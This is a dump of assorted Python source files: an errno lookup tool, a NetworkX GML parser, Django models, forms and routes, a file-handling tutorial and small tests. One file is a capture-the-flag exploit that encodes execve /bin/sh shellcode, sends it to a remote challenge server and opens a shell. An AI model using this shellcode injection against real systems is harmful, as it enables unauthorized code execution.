| content (stringlengths 0–1.05M) | origin (stringclasses 2 values) | type (stringclasses 2 values) |
---|---|---|
#! /usr/bin/env python3
from sys import argv
errno = {
'0': 'Success',
'1': 'TooBig',
'2': 'Acces',
'3': 'Addrinuse',
'4': 'Addrnotavail',
'5': 'Afnosupport',
'6': 'Again',
'7': 'Already',
'8': 'Badf',
'9': 'Badmsg',
'10': 'Busy',
'11': 'Canceled',
'12': 'Child',
'13': 'Connaborted',
'14': 'Connrefused',
'15': 'Connreset',
'16': 'Deadlk',
'17': 'Destaddrreq',
'18': 'Dom',
'19': 'Dquot',
'20': 'Exist',
'21': 'Fault',
'22': 'Fbig',
'23': 'Hostunreach',
'24': 'Idrm',
'25': 'Ilseq',
'26': 'Inprogress',
'27': 'Intr',
'28': 'Inval',
'29': 'Io',
'30': 'Isconn',
'31': 'Isdir',
'32': 'Loop',
'33': 'Mfile',
'34': 'Mlink',
'35': 'Msgsize',
'36': 'Multihop',
'37': 'Nametoolong',
'38': 'Netdown',
'39': 'Netreset',
'40': 'Netunreach',
'41': 'Nfile',
'42': 'Nobufs',
'43': 'Nodev',
'44': 'Noent',
'45': 'Noexec',
'46': 'Nolck',
'47': 'Nolink',
'48': 'Nomem',
'49': 'Nomsg',
'50': 'Noprotoopt',
'51': 'Nospc',
'52': 'Nosys',
'53': 'Notconn',
'54': 'Notdir',
'55': 'Notempty',
'56': 'Notrecoverable',
'57': 'Notsock',
'58': 'Notsup',
'59': 'Notty',
'60': 'Nxio',
'61': 'Overflow',
'62': 'Ownerdead',
'63': 'Perm',
'64': 'Pipe',
'65': 'Proto',
'66': 'Protonosupport',
'67': 'Prototype',
'68': 'Range',
'69': 'Rofs',
'70': 'Spipe',
'71': 'Srch',
'72': 'Stale',
'73': 'Timedout',
'74': 'Txtbsy',
'75': 'Xdev',
'76': 'Notcapable',
}
desc = {
'success': 'No error occurred. System call completed successfully.',
'toobig': 'Argument list too long.',
'acces': 'Permission denied.',
'addrinuse': 'Address in use.',
'addrnotavail': 'Address not available.',
'afnosupport': 'Address family not supported.',
'again': 'Resource unavailable, or operation would block.',
'already': 'Connection already in progress.',
'badf': 'Bad file descriptor.',
'badmsg': 'Bad message.',
'busy': 'Device or resource busy.',
'canceled': 'Operation canceled.',
'child': 'No child processes.',
'connaborted': 'Connection aborted.',
'connrefused': 'Connection refused.',
'connreset': 'Connection reset.',
'deadlk': 'Resource deadlock would occur.',
'destaddrreq': 'Destination address required.',
'dom': 'Mathematics argument out of domain of function.',
'dquot': 'Reserved.',
'exist': 'File exists.',
'fault': 'Bad address.',
'fbig': 'File too large.',
'hostunreach': 'Host is unreachable.',
'idrm': 'Identifier removed.',
'ilseq': 'Illegal byte sequence.',
'inprogress': 'Operation in progress.',
'intr': 'Interrupted function.',
'inval': 'Invalid argument.',
'io': 'I/O error.',
'isconn': 'Socket is connected.',
'isdir': 'Is a directory.',
'loop': 'Too many levels of symbolic links.',
'mfile': 'File descriptor value too large.',
'mlink': 'Too many links.',
'msgsize': 'Message too large.',
'multihop': 'Reserved.',
'nametoolong': 'Filename too long.',
'netdown': 'Network is down.',
'netreset': 'Connection aborted by network.',
'netunreach': 'Network unreachable.',
'nfile': 'Too many files open in system.',
'nobufs': 'No buffer space available.',
'nodev': 'No such device.',
'noent': 'No such file or directory.',
'noexec': 'Executable file format error.',
'nolck': 'No locks available.',
'nolink': 'Reserved.',
'nomem': 'Not enough space.',
'nomsg': 'No message of the desired type.',
'noprotoopt': 'Protocol not available.',
'nospc': 'No space left on device.',
'nosys': 'Function not supported.',
'notconn': 'The socket is not connected.',
'notdir': 'Not a directory or a symbolic link to a directory.',
'notempty': 'Directory not empty.',
'notrecoverable': 'State not recoverable.',
'notsock': 'Not a socket.',
'notsup': 'Not supported, or operation not supported on socket.',
'notty': 'Inappropriate I/O control operation.',
'nxio': 'No such device or address.',
'overflow': 'Value too large to be stored in data type.',
'ownerdead': 'Previous owner died.',
'perm': 'Operation not permitted.',
'pipe': 'Broken pipe.',
'proto': 'Protocol error.',
'protonosupport': 'Protocol not supported.',
'prototype': 'Protocol wrong type for socket.',
'range': 'Result too large.',
'rofs': 'Read-only file system.',
'spipe': 'Invalid seek.',
'srch': 'No such process.',
'stale': 'Reserved.',
'timedout': 'Connection timed out.',
'txtbsy': 'Text file busy.',
'xdev': 'Cross-device link.',
'notcapable': 'Extension: Capabilities insufficient.',
}
if __name__ == '__main__':
if len(argv) == 1:
print(f"Usage: {argv[0]} errno ...")
else:
for arg in argv[1:]:
if arg in errno:
print(f"{arg}: {errno[arg]} -- {desc[errno[arg].lower()]}")
else:
print(f"{arg}: ***UNKNOWN ERROR NUMBER***")
|
nilq/baby-python
|
python
|
"""
Read graphs in GML format.
"GML, the G>raph Modelling Language, is our proposal for a portable
file format for graphs. GML's key features are portability, simple
syntax, extensibility and flexibility. A GML file consists of a
hierarchical key-value lists. Graphs can be annotated with arbitrary
data structures. The idea for a common file format was born at the
GD'95; this proposal is the outcome of many discussions. GML is the
standard file format in the Graphlet graph editor system. It has been
overtaken and adapted by several other systems for drawing graphs."
See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
Requires pyparsing: http://pyparsing.wikispaces.com/
Format
------
See http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
for format specification.
Example graphs in GML format:
http://www-personal.umich.edu/~mejn/netdata/
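A minimal GML file, shown here for illustration only (hypothetical data)::

    graph [
        node [ id 1 label "a" ]
        node [ id 2 label "b" ]
        edge [ source 1 target 2 ]
    ]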
"""
__author__ = """Aric Hagberg (hagberg@lanl.gov)"""
# Copyright (C) 2008-2010 by
# Aric Hagberg <hagberg@lanl.gov>
# Dan Schult <dschult@colgate.edu>
# Pieter Swart <swart@lanl.gov>
# All rights reserved.
# BSD license.
__all__ = ['read_gml', 'parse_gml', 'generate_gml', 'write_gml']
import networkx as nx
from networkx.exception import NetworkXError
from networkx.utils import is_string_like, open_file
@open_file(0,mode='rb')
def read_gml(path,encoding='UTF-8',relabel=False):
"""Read graph in GML format from path.
Parameters
----------
path : filename or filehandle
The filename or filehandle to read from.
encoding : string, optional
Text encoding.
relabel : bool, optional
        If True, use the GML node label attribute for node names; otherwise
        use the node id.
Returns
-------
G : MultiGraph or MultiDiGraph
Raises
------
ImportError
If the pyparsing module is not available.
See Also
--------
write_gml, parse_gml
Notes
-----
Requires pyparsing: http://pyparsing.wikispaces.com/
References
----------
GML specification:
http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
Examples
--------
>>> G=nx.path_graph(4)
>>> nx.write_gml(G,'test.gml')
>>> H=nx.read_gml('test.gml')
"""
lines=(line.decode(encoding) for line in path)
G=parse_gml(lines,relabel=relabel)
return G
def parse_gml(lines, relabel=True):
"""Parse GML graph from a string or iterable.
Parameters
----------
lines : string or iterable
Data in GML format.
relabel : bool, optional
        If True, use the GML node label attribute for node names; otherwise
        use the node id.
Returns
-------
G : MultiGraph or MultiDiGraph
Raises
------
ImportError
If the pyparsing module is not available.
See Also
--------
write_gml, read_gml
Notes
-----
This stores nested GML attributes as dictionaries in the
NetworkX graph, node, and edge attribute structures.
Requires pyparsing: http://pyparsing.wikispaces.com/
References
----------
GML specification:
http://www.infosun.fim.uni-passau.de/Graphlet/GML/gml-tr.html
"""
try:
from pyparsing import ParseException
except ImportError:
try:
from matplotlib.pyparsing import ParseException
        except ImportError:
raise ImportError('Import Error: not able to import pyparsing:',
'http://pyparsing.wikispaces.com/')
try:
data = "".join(lines)
gml = pyparse_gml()
tokens =gml.parseString(data)
except ParseException as err:
print((err.line))
print((" "*(err.column-1) + "^"))
print(err)
raise
# function to recursively make dicts of key/value pairs
def wrap(tok):
listtype=type(tok)
result={}
for k,v in tok:
if type(v)==listtype:
result[str(k)]=wrap(v)
else:
result[str(k)]=v
return result
    # track whether parallel edges occur; assume a multigraph until proven otherwise
    multigraph=False
if tokens.directed==1:
G=nx.MultiDiGraph()
else:
G=nx.MultiGraph()
for k,v in tokens.asList():
if k=="node":
vdict=wrap(v)
node=vdict['id']
G.add_node(node,attr_dict=vdict)
elif k=="edge":
vdict=wrap(v)
source=vdict.pop('source')
target=vdict.pop('target')
if G.has_edge(source,target):
multigraph=True
G.add_edge(source,target,attr_dict=vdict)
else:
G.graph[k]=v
# switch to Graph or DiGraph if no parallel edges were found.
if not multigraph:
if G.is_directed():
G=nx.DiGraph(G)
else:
G=nx.Graph(G)
if relabel:
# relabel, but check for duplicate labels first
mapping=[(n,d['label']) for n,d in G.node.items()]
x,y=zip(*mapping)
if len(set(y))!=len(G):
raise NetworkXError('Failed to relabel nodes: '
'duplicate node labels found. '
'Use relabel=False.')
G=nx.relabel_nodes(G,dict(mapping))
return G
def pyparse_gml():
"""A pyparsing tokenizer for GML graph format.
This is not intended to be called directly.
See Also
--------
write_gml, read_gml, parse_gml
"""
try:
from pyparsing import \
Literal, CaselessLiteral, Word, Forward,\
ZeroOrMore, Group, Dict, Optional, Combine,\
ParseException, restOfLine, White, alphas, alphanums, nums,\
OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex
except ImportError:
try:
from matplotlib.pyparsing import \
Literal, CaselessLiteral, Word, Forward,\
ZeroOrMore, Group, Dict, Optional, Combine,\
ParseException, restOfLine, White, alphas, alphanums, nums,\
OneOrMore,quotedString,removeQuotes,dblQuotedString, Regex
        except ImportError:
raise ImportError('pyparsing not found',
'http://pyparsing.wikispaces.com/')
lbrack = Literal("[").suppress()
rbrack = Literal("]").suppress()
pound = ("#")
comment = pound + Optional( restOfLine )
integer = Word(nums+'-').setParseAction(lambda s,l,t:[ int(t[0])])
real = Regex(r"[+-]?\d+\.\d*([eE][+-]?\d+)?").setParseAction(
lambda s,l,t:[ float(t[0]) ])
dblQuotedString.setParseAction( removeQuotes )
key = Word(alphas,alphanums+'_')
value_atom = (real | integer | Word(alphanums) | dblQuotedString)
value = Forward() # to be defined later with << operator
keyvalue = Group(key+value)
value << (value_atom | Group( lbrack + ZeroOrMore(keyvalue) + rbrack ))
node = Group(Literal("node") + lbrack + Group(OneOrMore(keyvalue)) + rbrack)
edge = Group(Literal("edge") + lbrack + Group(OneOrMore(keyvalue)) + rbrack)
creator = Group(Literal("Creator")+ Optional( restOfLine ))
version = Group(Literal("Version")+ Optional( restOfLine ))
graphkey = Literal("graph").suppress()
graph = Dict (Optional(creator)+Optional(version)+\
graphkey + lbrack + ZeroOrMore( (node|edge|keyvalue) ) + rbrack )
graph.ignore(comment)
return graph
def generate_gml(G):
"""Generate a single entry of the graph G in GML format.
Parameters
----------
G : NetworkX graph
Returns
-------
lines: string
Lines in GML format.
Notes
-----
This implementation does not support all Python data types as GML
data. Nodes, node attributes, edge attributes, and graph
    attributes must be either dictionaries or single strings or
    numbers. If they are not, an attempt is made to represent them as
strings. For example, a list as edge data
G[1][2]['somedata']=[1,2,3], will be represented in the GML file
as::
edge [
source 1
target 2
somedata "[1, 2, 3]"
]
"""
# recursively make dicts into gml brackets
def listify(d,indent,indentlevel):
result='[ \n'
for k,v in d.items():
if type(v)==dict:
v=listify(v,indent,indentlevel+1)
result += indentlevel*indent+"%s %s\n"%(k,v)
return result+indentlevel*indent+"]"
def string_item(k,v,indent):
# try to make a string of the data
if type(v)==dict:
v=listify(v,indent,2)
elif is_string_like(v):
v='"%s"'%v
elif type(v)==bool:
v=int(v)
return "%s %s"%(k,v)
# check for attributes or assign empty dict
if hasattr(G,'graph_attr'):
graph_attr=G.graph_attr
else:
graph_attr={}
if hasattr(G,'node_attr'):
node_attr=G.node_attr
else:
node_attr={}
indent=2*' '
count=iter(range(len(G)))
node_id={}
yield "graph ["
if G.is_directed():
yield indent+"directed 1"
# write graph attributes
for k,v in G.graph.items():
yield indent+string_item(k,v,indent)
# write nodes
for n in G:
yield indent+"node ["
# get id or assign number
nid=G.node[n].get('id',next(count))
node_id[n]=nid
yield 2*indent+"id %s"%nid
label=G.node[n].pop('label',n)
if is_string_like(label):
label='"%s"'%label
yield 2*indent+'label %s'%label
if n in G:
for k,v in G.node[n].items():
if k=='id': continue
yield 2*indent+string_item(k,v,indent)
yield indent+"]"
# write edges
for u,v,edgedata in G.edges_iter(data=True):
yield indent+"edge ["
yield 2*indent+"source %s"%node_id[u]
yield 2*indent+"target %s"%node_id[v]
for k,v in edgedata.items():
if k=='source': continue
if k=='target': continue
yield 2*indent+string_item(k,v,indent)
yield indent+"]"
yield "]"
@open_file(1,mode='wb')
def write_gml(G, path):
"""
Write the graph G in GML format to the file or file handle path.
Parameters
----------
path : filename or filehandle
The filename or filehandle to write. Filenames ending in
        .gz or .bz2 will be compressed.
See Also
--------
read_gml, parse_gml
Notes
-----
    GML specifications indicate that the file should only use 7-bit ASCII
    text; this writer encodes the output as iso8859-1 (latin-1).
This implementation does not support all Python data types as GML
data. Nodes, node attributes, edge attributes, and graph
    attributes must be either dictionaries or single strings or
    numbers. If they are not, an attempt is made to represent them as
strings. For example, a list as edge data
G[1][2]['somedata']=[1,2,3], will be represented in the GML file
as::
edge [
source 1
target 2
somedata "[1, 2, 3]"
]
Examples
---------
>>> G=nx.path_graph(4)
>>> nx.write_gml(G,"test.gml")
Filenames ending in .gz or .bz2 will be compressed.
>>> nx.write_gml(G,"test.gml.gz")
"""
for line in generate_gml(G):
line+='\n'
path.write(line.encode('latin-1'))
# fixture for nose tests
def setup_module(module):
from nose import SkipTest
try:
import pyparsing
    except ImportError:
try:
import matplotlib.pyparsing
        except ImportError:
raise SkipTest("pyparsing not available")
# fixture for nose tests
def teardown_module(module):
import os
os.unlink('test.gml')
os.unlink('test.gml.gz')
|
nilq/baby-python
|
python
|
# py2.7 and py3 compatibility imports
from __future__ import absolute_import
from __future__ import unicode_literals
from django.conf.urls import url, include
from rest_framework import routers
from . import views
router = routers.DefaultRouter()
router.register(r'shadowsocks/config', views.ConfigViewSet)
router.register(r'shadowsocks/account', views.AccountViewSet)
router.register(r'shadowsocks/node', views.NodeViewSet)
router.register(r'shadowsocks/nodeaccount', views.NodeAccountViewSet)
router.register(r'shadowsocks/ssmanager', views.SSManagerViewSet)
urlpatterns = [
url(r'^', include(router.urls)),
]
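# For reference, DefaultRouter derives the routes below for each registered
# viewset (standard DRF behaviour, shown here for illustration):
#   shadowsocks/config/        -> list / create
#   shadowsocks/config/{pk}/   -> retrieve / update / destroy
# plus a browsable API root at the prefix itself.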
|
nilq/baby-python
|
python
|
'''
Working with files in Python
'''
# reading and writing files
path_to_file = '00 - Very Basics/text_files/'
file_name1 = input('What is the file name you want to write to? ')
try:
file1 = open('{}/{}.txt'.format(path_to_file, file_name1), 'w')
file1.write('''
You don't know how to be a man
I open myself, you close me,
I want to run, but you catch me again,
I want to cry out, you tell me to shut up,
Why do I do it?
I throw myself, like a child
I listen to you, pleasant, humble
Why do I do it?
Why don't I leave, why do I settle?
I gave you power over me,
I am strong but not this way, but not now
When do I have to say it;
How do I say it to you?
You don't know how to be a man
For a girl.
You didn't even try,
Not even once.
My argument is mute,
It's just for me.
You don't know how to be a man
And nobody teaches you how.
''')
file1.close()
except FileNotFoundError as error:
print(error)
else:
    print('Text file was correctly created/written.')
file_name2 = input('What is the file name you want to read from? ')
try:
file2 = open('{}/{}.txt'.format(path_to_file, file_name2), 'r')
print(file2.read())
file2.close()
except FileNotFoundError as error:
print(error)
else:
    print('File was read correctly.')
print(file1.closed)
print(file2.closed)
try:
with open('{}/{}.txt'.format(path_to_file, file_name2)) as myFile:
print(myFile.read())
except FileNotFoundError as error:
print(error)
songs = [
'Visele',
'Iubirea noastra muta',
'Da\' ce tu',
'Haina ta',
'Ce s-a intamplat cu noi',
'My Favourite Man',
'Bandana',
'Bolnavi amandoi',
'Cosmos',
'Octombrie Rosu',
'Eroii pieselor noastre',
'Beau',
'In locul meu',
'Cel mai bun prieten',
'Nu stii tu sa fii barbat'
]
try:
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs.txt'), 'w') as songs_file:
for song in songs:
songs_file.write('{}\n'.format(song))
except FileNotFoundError as error:
print(error)
try:
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'w') as songs_file:
for song in songs:
songs_file.writelines('%s\n'%song)
except FileNotFoundError as error:
print(error)
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file:
print(songs_file.readline(10))
print(songs_file.tell())
print(songs_file.readlines())
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt')) as songs_file:
print(songs_file.tell())
songs_file.seek(10, 0)
print(songs_file.tell())
print(songs_file.read(15))
print(songs_file.tell())
with open('{}/{}'.format(path_to_file, 'irina_rimes_songs1.txt'), 'r+') as songs_file:
songs_file.seek(0, 2)
print(songs_file.tell())
songs_file.write('Hello')
# os module
import os
print(os.getcwd())
# print(os.get_exec_path())
try:
os.mkdir('nice_folder')
except Exception:
pass
print(os.path.isdir('nice_folder'))
try:
os.rename('nice_folder', 'ugly_folder')
except Exception:
pass
print(os.path.isdir('nice_folder'))
try:
os.remove('ugly_folder')
except Exception as error:
print(error)
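# Note: os.remove() deletes files only, so the call above fails on a directory
# and the except block prints the error. A directory is removed with os.rmdir():
try:
    os.rmdir('ugly_folder')
except OSError as error:
    print(error)
print(os.path.isdir('ugly_folder'))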
|
nilq/baby-python
|
python
|
from django.contrib.auth import get_user_model
from django.db import models, transaction
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from libs.models import BaseModel
User = get_user_model()
class State(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=80)
def __str__(self):
return self.name
class Meta:
verbose_name = _('State')
verbose_name_plural = _('States')
db_table = 'state'
class City(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=80)
state = models.ForeignKey(State, related_name='cities', on_delete=models.CASCADE, verbose_name=_('state'))
def __str__(self):
return f'{self.name} - {self.state}'
class Meta:
verbose_name = _('City')
verbose_name_plural = _('Cities')
db_table = 'city'
class AirLine(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=80)
def __str__(self):
return self.name
class Meta:
verbose_name = _('Air Line')
verbose_name_plural = _('Air Lines')
db_table = 'airline'
class Plane(BaseModel):
name = models.CharField(verbose_name=_('name'), max_length=50)
airline = models.ForeignKey(AirLine, related_name='planes', on_delete=models.CASCADE, verbose_name=_('air line'))
capacity = models.PositiveSmallIntegerField(verbose_name=_('capacity'))
def __str__(self):
return f'{self.name} - {self.airline} - {self.capacity}'
class Meta:
verbose_name = _('Plane')
verbose_name_plural = _('Planes')
db_table = 'plane'
class Flight(BaseModel):
flight_number = models.CharField(max_length=150, verbose_name=_('flight number'))
plane = models.ForeignKey(Plane, related_name='flights', on_delete=models.CASCADE, verbose_name=_('plane'))
from_city = models.ForeignKey(
City,
related_name='origin_flights',
on_delete=models.CASCADE,
verbose_name=_('origin')
)
to_city = models.ForeignKey(
City,
related_name='destination_flights',
on_delete=models.CASCADE,
verbose_name=_('destination')
)
depart_datetime = models.DateTimeField(verbose_name=_('depart datetime'))
arrive_datetime = models.DateTimeField(verbose_name=_('modified time'))
price = models.IntegerField(verbose_name=_('price'))
def prototype_create_seats(self):
for c in range(1, self.plane.capacity + 1):
FlightSeat.objects.create(flight=self, seat=Seat.objects.create(number=c))
def available_flight_depart_datetime(self):
return bool(self.depart_datetime > timezone.now())
def __str__(self):
return self.flight_number
class Meta:
verbose_name = _('Flight')
verbose_name_plural = _('Flights')
db_table = 'flight'
class Seat(BaseModel):
number = models.PositiveSmallIntegerField(verbose_name=_('number'))
is_reserve = models.BooleanField(verbose_name=_('is reserve'), default=False)
reserved_time = models.DateTimeField(default=None, null=True, blank=True)
def __str__(self):
return f'{self.number} - {self.is_reserve}'
class Meta:
verbose_name = _('Seat')
verbose_name_plural = _('Seats')
db_table = 'seat'
class FlightSeat(BaseModel):
flight = models.ForeignKey(Flight, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('flight'))
seat = models.ForeignKey(Seat, related_name='flight_seats', on_delete=models.CASCADE, verbose_name=_('seat'))
customer = models.ForeignKey(
User,
related_name='flight_seats',
on_delete=models.CASCADE,
verbose_name=_('customer'),
null=True, blank=True
)
def __str__(self):
return f'{self.id}'
def available_flight_seat(self):
return bool(self.customer is None and not self.seat.is_reserve)
class Meta:
verbose_name = _('Flight Seat')
verbose_name_plural = _('Flight Seats')
db_table = 'flight_seat'
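# Hedged usage sketch (object values are illustrative, not from this project);
# the `transaction` import above suggests seat creation is meant to run atomically:
#
#   with transaction.atomic():
#       flight = Flight.objects.get(flight_number='IR-702')
#       flight.prototype_create_seats()  # one Seat + FlightSeat per unit of plane capacity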
|
nilq/baby-python
|
python
|
from .contract import Contract # noqa
from .template import Template, TemplateError # noqa
from .asyncio.contract import AsyncContract # noqa
from .asyncio.template import AsyncTemplate # noqa
__all__ = (
"Contract",
"Template",
"TemplateError",
"AsyncContract",
"AsyncTemplate"
)
__version__ = '0.0.4'
|
nilq/baby-python
|
python
|
# Generated by Django 2.2.9 on 2020-02-12 10:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('events', '0075_change_place_srid'),
]
operations = [
migrations.AlterField(
model_name='image',
name='license',
field=models.ForeignKey(default='event_only', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='images', to='events.License', verbose_name='License'),
),
]
|
nilq/baby-python
|
python
|
import memcache
import simplejson
class SimplejsonWrapper(object):
def __init__(self, file, protocol=None):
self.file = file
    def dump(self, value):
simplejson.dump(value, self.file)
def load(self):
return simplejson.load(self.file)
cache = memcache.Client(['127.0.0.1:11211'], pickler=SimplejsonWrapper, unpickler=SimplejsonWrapper)
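# Hypothetical round trip (assumes a memcached instance on 127.0.0.1:11211):
#   cache.set('greeting', {'hello': 'world'})
#   print(cache.get('greeting'))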
|
nilq/baby-python
|
python
|
from pwn import *
context.binary = elf = ELF("shellcoded")
r = remote("challenge.ctf.games", 32175)
# shellcode from pwn library
shellcode = list(asm(shellcraft.sh()))
# manually find shellcode online
#shellcode = list(b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05')
modified_sc = []
# reverse the action done by the binary
for i in range(len(shellcode)):
if i & 1 != 0:
v3 = 1
else:
v3 = -1
# 1. '& 0xFF': brings negative int back to unsigned byte convertible range
# 2. byte-order: little since arch is amd-64-little
    # 3. byte codes should be unsigned: adding to or subtracting from the original
    #    compiled shellcode wraps around (unsigned overflow) when outside 0..0xff,
    #    which brings it back to the original byte in the shellcode
modified_sc.append(((shellcode[i] + (v3 * i))&0xFF).to_bytes(1, byteorder = 'little', signed = False))
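# sanity check of the mod-256 wraparound relied on above:
#   (0xFF + 1) & 0xFF == 0x00 and (0x00 - 1) & 0xFF == 0xFF
# so the & 0xFF mask mirrors the binary's unsigned-byte overflow in reverse.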
str_sc = b''.join(modified_sc)
# payload
print(str_sc)
r.sendline(str_sc)
r.interactive()
# flag{f27646ae277113d24c73dbc66a816721}
|
nilq/baby-python
|
python
|
from kNUI.main import run
|
nilq/baby-python
|
python
|
token = "your new token here"
|
nilq/baby-python
|
python
|
from django import forms
from django.contrib.auth import authenticate
from django.contrib.auth.forms import PasswordResetForm, SetPasswordForm
from django.core.validators import MinLengthValidator
from django.db.models import Q
from django.contrib.auth.models import User
from social_django.views import complete
from accounts.models import Instructor
class UserForm(forms.ModelForm):
"""
This form allow user to edit his profile.
On profile page there are a couple of forms with required fields.
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='user_form', widget=forms.HiddenInput())
class Meta:
model = User
fields = ('form_id', 'first_name', 'last_name')
widgets = {
'id': forms.HiddenInput(),
'form_id': forms.HiddenInput(),
}
class ChangeEmailForm(forms.Form):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='email_form', widget=forms.HiddenInput())
email = forms.EmailField()
def clean_email(self):
email = self.cleaned_data['email']
my_email = self.initial['email']
if 'email' in self.changed_data:
already_taken = User.objects.filter(
Q(email=email) | Q(secondary__email=email)
).exclude(email=my_email)
if already_taken:
                raise forms.ValidationError('This email is already taken.')
return email
def save(self, request, commit=True):
"""
This form calls to `complete` function of python-social-auth.
Send email to the user with confirmation link when user changes his email.
:param request: django request
:param commit: save to db or not?
:return:
"""
if self.initial['email'] != self.cleaned_data['email']:
return complete(request, 'email', force_update=True)
class InstructorForm(forms.ModelForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='instructor_form', widget=forms.HiddenInput())
class Meta:
model = Instructor
fields = ('form_id', 'user', 'institution')
widgets = {
'user': forms.HiddenInput(),
'form_id': forms.HiddenInput(),
}
class CreatePasswordForm(forms.ModelForm):
"""This form will be used in case when user has no password and wants to create it."""
form_id = forms.CharField(max_length=255, initial='password_form', widget=forms.HiddenInput())
confirm_password = forms.CharField(max_length=255, widget=forms.PasswordInput(), validators=[MinLengthValidator(6)])
password = forms.CharField(max_length=255, widget=forms.PasswordInput(), validators=[MinLengthValidator(6)])
def clean(self):
data = self.cleaned_data
        if data.get('password') != data.get('confirm_password'):
            self.add_error(None, 'Password and Confirm password fields do not match.')
            raise forms.ValidationError(
                {'password': 'Should be equal to the confirm password field.',
                 'confirm_password': 'Should be equal to the password field.'})
return self.cleaned_data
class Meta:
model = User
fields = ('password', 'confirm_password', 'form_id')
def save(self, commit=True):
self.instance.set_password(self.cleaned_data['password'])
if commit:
self.instance.save()
return self.instance
class ChangePasswordForm(CreatePasswordForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
current_password = forms.CharField(max_length=255, widget=forms.PasswordInput())
def clean(self):
data = self.cleaned_data
        if data.get('password') != data.get('confirm_password'):
            self.add_error('password', 'Should be equal to the confirm password field.')
            self.add_error('confirm_password', 'Should be equal to the password field.')
            self.add_error(None, 'Password and Confirm password fields do not match.')
return self.cleaned_data
def clean_current_password(self):
current_pw = self.cleaned_data.get('current_password')
user = authenticate(username=self.instance, password=current_pw)
if user is None:
            self.add_error('current_password', 'The provided current password does not match your password.')
return current_pw
class Meta:
model = User
fields = ('current_password', 'password', 'confirm_password', 'form_id')
class DeleteAccountForm(forms.ModelForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
form_id = forms.CharField(max_length=255, initial='delete_account_form', widget=forms.HiddenInput())
confirm_delete_account = forms.BooleanField(
required=True,
widget=forms.HiddenInput(),
initial=False
)
def save(self, commit=True):
self.instance.is_active = False
if commit:
self.instance.save()
return self.instance
class Meta:
model = User
fields = ('form_id', 'confirm_delete_account')
widgets = {
'id': forms.HiddenInput(),
}
class CustomPasswordResetForm(PasswordResetForm):
"""
Field form_id is here to check what form was submitted.
In view: If we found that form_id is present in request.POST we pass POST data to this form and validate it.
If form_id not found in request.POST we will not validate this form.
"""
def clean_email(self):
user = User.objects.filter(email=self.cleaned_data['email']).first()
if not user:
raise forms.ValidationError('No registered account with such email.')
if not user.has_usable_password():
raise forms.ValidationError(
                'User with this email does not have a password; most likely you registered via a social network.')
return self.cleaned_data['email']
class SocialForm(forms.ModelForm):
institution = forms.CharField(required=True)
what_do_you_teach = forms.CharField(required=True)
class Meta:
model = Instructor
fields = (
'user',
'institution',
'what_do_you_teach'
)
widgets = {
'user': forms.HiddenInput(),
}
class CustomSetPasswordForm(SetPasswordForm):
def __init__(self, user, *args, **kwargs):
super(CustomSetPasswordForm, self).__init__(user, *args, **kwargs)
self.fields['new_password1'].validators.append(MinLengthValidator(6))
self.fields['new_password2'].validators.append(MinLengthValidator(6))
|
nilq/baby-python
|
python
|
import unittest
from mock import patch, MagicMock
from rawes.elastic import Elastic
from requests.models import Response
from rawes.http_connection import HttpConnection
class TestConnectionPooling(unittest.TestCase):
"""Connection pooling was added on top of Rawes, it wasn't designed from
the beggingin. We need some tests to ensure our expectations of the
connection pooling are met.
"""
def testBasicRoundRobin(self):
""" Set up a client with three different hosts to connect to, make
multiple calls and check that each call goes on a different host in a
Round Robin fashion
"""
hosts = ['http://someserver1:9200', 'http://someserver2:9200',
'http://someserver3:9200']
es = Elastic(hosts, connection_pool_kwargs={'dead_timeout': 10})
with patch('rawes.http_connection.requests.Session.request',
MagicMock(return_value=None)) as request:
request.return_value = Response()
called = []
for _ in xrange(len(hosts)):
es.get()
# Save a list of called hosts (and remove trailing /)
called.append(request.call_args[0][1][:-1])
# Check against original hosts list
self.assertSetEqual(set(hosts), set(called),
                            'All hosts in connection pool should be used')
called_again = []
for _ in xrange(len(hosts)):
es.get()
# Call the same hosts again (don't forget about the trailing /)
called_again.append(request.call_args[0][1][:-1])
# Check they were called in the same order as before
self.assertListEqual(called, called_again,
'Round robin order wasn\'t preserved')
|
nilq/baby-python
|
python
|
import os.path
__all__ = [
"__name__", "__summary__", "__url__", "__version__",
"__author__", "__email__", "__license__"
]
try:
base_dir = os.path.dirname(os.path.abspath(__file__))
except NameError:
base_dir = None
__title__ = "makebib"
__summary__ = "A simple script to generate a local bib file from a central database."
__url__ = 'https://gitlab.com/Verner/makebib'
__version__ = "0.2.2"
__author__ = "Jonathan L. Verner"
__email__ = "jonathan@temno.eu"
__license__ = "MIT"
|
nilq/baby-python
|
python
|
import json
import os
import sys
import logging
import traceback
import re
import boto3
import time
# helper functions
from queue_wrapper import *
